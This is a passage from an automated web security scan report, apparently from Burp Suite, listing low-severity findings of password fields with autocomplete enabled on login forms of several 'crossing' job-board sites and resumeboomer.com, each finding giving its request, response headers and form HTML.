                       <form id="loginform" name="loginform" Method="POST" action="http://www.purchasingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.108. http://www.qaqccrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.qaqccrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:53 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2cvnjstpd6ib3smaikg60ai1v0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120361

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.qaqccrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.109. http://www.radiocrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.radiocrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=beoah5h5h42a821e8g7r1l0ko5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113112

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.radiocrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.110. http://www.realestateandlandcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.realestateandlandcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:57 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=om23b647f73v2jeihjo6qjanv4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133093

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.realestateandlandcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.111. http://www.recruitingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.recruitingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rtub18ulrc3vam4sd88gmoelh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.recruitingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.112. http://www.researchingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.researchingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:42 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=14bsqa9jfj35kburppunl56pe1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.researchingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.113. http://www.resumeboomer.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resumeboomer.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /?utm_source=JDJ&utm_medium=Banner&utm_campaign=blast-300x250\ HTTP/1.1
Host: www.resumeboomer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=m9qik3c52objld7u33gc65u833; path=/; domain=resumeboomer.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18190


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!--SLIDE PANEL STARTS-->
<form action="#" method="post" name="resumelogin1">
<div style="font-size:20px; font-weight:bold; padding-left:100px; padding-top:10px;">
...[SNIP]...
<td><input type="password" id="password" name="password" class="input_text" value="Password" onFocus="onfocusval('password','Password')" onBlur="onblurval('password','Password')" /></td>
...[SNIP]...

11.114. http://www.resumeboomer.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.resumeboomer.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.resumeboomer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=rflo577r2gvrm7p49d1ei6a8c1; path=/; domain=resumeboomer.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18190


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!--SLIDE PANEL STARTS-->
<form action="#" method="post" name="resumelogin1">
<div style="font-size:20px; font-weight:bold; padding-left:100px; padding-top:10px;">
...[SNIP]...
<td><input type="password" id="password" name="password" class="input_text" value="Password" onFocus="onfocusval('password','Password')" onBlur="onblurval('password','Password')" /></td>
...[SNIP]...

11.115. http://www.retailcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.retailcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0f8bbnd9tsuoh4h0j5d47on745; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105722

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.retailcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.116. http://www.sciencescrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sciencescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16dk0s9ru5o61n37p22c60grs4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:01 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 139820

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.sciencescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.117. http://www.scientistcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scientistcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rkh4pgjirjhh2qdflm011inei3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.scientistcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.118. http://www.sellingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sellingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u9aug9qog02rlvafs62g9l9651; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130266

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.sellingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.119. http://www.sqlcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sqlcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ic5cgni73m80fllgi2jl24kau2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109037

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.sqlcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.120. http://www.teenagercrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.teenagercrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=240j3fr7u4qsmuqu986njli7d2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:56 GMT
Connection: close
